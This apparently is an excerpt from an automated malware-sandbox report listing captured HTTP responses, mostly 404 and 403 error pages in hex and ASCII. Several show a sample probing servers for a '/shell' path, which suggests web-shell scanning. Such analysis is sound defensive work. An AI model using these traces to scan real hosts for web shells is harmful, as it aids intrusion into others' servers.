      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/7.5X-Powered-By: ASP.NETDate: Tue, 19 Jul 2022 11:08:27 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 19 Jul 2022 11:08:28 GMTServer: ApacheX-Robots-Tag: noindex, nofollow, noarchiveContent-Length: 255Keep-Alive: timeout=15, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at 127.0.0.1 Port 80</address></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=iso-8859-1Date: Tue, 19 Jul 2022 11:08:29 GMTServer: ApacheContent-Length: 203Connection: CloseData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 68 65 6c 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /shell was not found on this server.</p></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundKeep-Alive: timeout=60, max=199Content-Type: text/htmlDate: Tue, 19 Jul 2022 17:00:14 GMTCache-Control: no-cacheContent-Length: 223Connection: Keep-AliveAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 72 65 3e 3c 2f 70 72 65 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><head> <title>Not Found</title> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"></head><body><h2>Access Error: 404 -- Not Found</h2><pre></pre></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 19 Jul 2022 11:08:31 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 19 Jul 2022 11:08:31 GMTServer: Apache/2.4.18 (Ubuntu)Content-Length: 271Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 19 Jul 2022 07:54:35 GMTServer: DNVRS-WebsCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 19 Jul 2022 11:07:59 GMTServer: WebsX-Frame-Options: SAMEORIGINCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=180, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: Microsoft-Azure-Application-Gateway/v2Date: Tue, 19 Jul 2022 11:08:37 GMTContent-Type: text/htmlContent-Length: 179Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 4d 69 63 72 6f 73 6f 66 74 2d 41 7a 75 72 65 2d 41 70 70 6c 69 63 61 74 69 6f 6e 2d 47 61 74 65 77 61 79 2f 76 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>Microsoft-Azure-Application-Gateway/v2</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 19 Jul 2022 11:08:37 GMTServer: Apache/2.4.7 (Ubuntu)Content-Length: 277Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 68 65 6c 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /shell was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at 127.0.0.1 Port 80</address></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 19 Jul 2022 11:08:37 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 271Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at 127.0.0.1 Port 80</address></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Length: 134Content-Type: text/html; charset=UTF-8Date: Tue, 19 Jul 2022 11:08:37 GMTData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 34 30 33 3c 2f 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e Data Ascii: <!doctype html><meta charset="utf-8"><meta name=viewport content="width=device-width, initial-scale=1"><title>403</title>403 Forbidden
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/7.5X-Powered-By: ASP.NETDate: Tue, 19 Jul 2022 11:08:53 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: TengineDate: Tue, 19 Jul 2022 11:08:37 GMTContent-Type: text/htmlContent-Length: 238Connection: keep-aliveVia: cache8.us11[,0]Timing-Allow-Origin: *EagleId: 0830559c16582289179192406eData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0d 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 55 52 4c 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 68 72 2f 3e 50 6f 77 65 72 65 64 20 62 79 20 54 65 6e 67 69 6e 65 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>403 Forbidden</h1><p>You don't have permission to access the URL on this server.<hr/>Powered by Tengine</body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: Keep-AliveContent-Length: 109Date: Tue, 19 Jul 2022 11:08:34 GMTExpires: 0Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 45 72 72 6f 72 20 34 30 34 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><title>Error 404: Not Found</title></head><body><h1>Error 404: Not Found</h1></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/7.5X-Powered-By: ASP.NETDate: Tue, 19 Jul 2022 11:08:38 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 